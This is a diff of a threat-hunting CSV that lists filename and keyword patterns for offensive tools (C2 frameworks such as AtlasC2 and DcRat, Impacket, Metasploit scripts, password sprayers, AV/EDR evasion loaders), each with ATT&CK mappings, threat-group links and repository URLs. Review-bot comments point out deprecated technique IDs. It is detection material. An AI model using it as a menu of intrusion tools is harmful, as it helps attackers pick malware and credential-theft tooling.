- TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*AsyncRAT/DCRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*AsStrongAsFuck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*AsStrongAsFuck.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*async_webshell-all.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*AsyncRAT/DCRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*asyncssh_commander.py *","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful 
AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*asyncssh_commander.py*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" -"*atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*Athena.Forwarders.SMB*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*athena/agent_code/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*AthenaPlugins.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*atexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Athena.Forwarders.SMB*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*athena/agent_code/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*AthenaPlugins.csproj*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*AtlasC2*APIModels*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2*Client*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2*implant*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" 
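Review bot: The rows rewritten in this hunk keep MITRE ATT&CK technique IDs that were retired when sub-techniques were introduced, so they will not join against current ATT&CK data. The three Athena rows (`*Athena.Forwarders.SMB*`, `*athena/agent_code/*`, `*AthenaPlugins.csproj*`) list `T1086`, `T1107`, `T1032` and `T1024`, and the two WinPwn rows (`*asreproast /*`, `*ASreproasting.txt*`) list `T1035`. As far as I know the current equivalents are `T1059.001`, `T1070.004`, `T1573` (for both cryptographic-protocol IDs) and `T1569.002`. Since the refresh already rewrites these rows, I would correct the `metadata_tool_techniques` column in the same pass. It would also help to validate every ID in that column against the current ATT&CK release whenever the star and fork counts are regenerated, so stale mappings do not carry over from one refresh to the next.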
@@ -7361,9 +7506,9 @@ "*AtlasC2b.exe*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2b.sln*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasImplant.yar*","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","193","38","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" -"*AtlasReaper.exe*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","202","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" -"*AtlasReaper-main*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - 
TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","202","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" -"*atmail2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*AtlasReaper.exe*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*AtlasReaper-main*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*atmail2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*atomizer imap *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer lync *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer owa *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" 
@@ -7393,15 +7538,15 @@ "*Augustus-main.zip*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*ausecwa/bof-registry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*auth/cc2_ssh.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. 
CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" -"*auto_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*auto_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*auto_exploit_blank_password*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" "*auto_pass_the_hash.*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*auto_pass_the_hash.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*auto_target_linux.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*auto_target_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*autobloody -*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"*autobloody.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"*autobloody-main*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" +"*auto_pass_the_hash.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auto_target_linux.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*auto_target_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*autobloody -*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*autobloody.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*autobloody-main*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" "*AutoBypass.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*AutoC2.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*AutoC2/All.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" 
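Review bot: The re-added metasploit rows in this hunk (`*auto_brute.rc*`, `*auto_pass_the_hash.rc*`, `*auto_target_linux.rb*`, `*auto_target_windows.rb*`) still carry `T1204 -T1210` in `metadata_tool_techniques`, with no space after the hyphen. A consumer that splits this field on ` - ` would get one merged token and lose both techniques from its ATT&CK mapping; since the rows are rewritten anyway, the value should read `T1204 - T1210`. The same string is in the `*autoexploit.rc*` row of the following `@@ -7418,8 +7563,8 @@` hunk. The lists also hold IDs that I believe are deprecated or revoked in current ATT&CK (`T1075`, `T1064`), and `T1076.001` on the autobloody rows does not look like a valid sub-technique. These should be checked against the ATT&CK release that the detection content built from this CSV targets.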
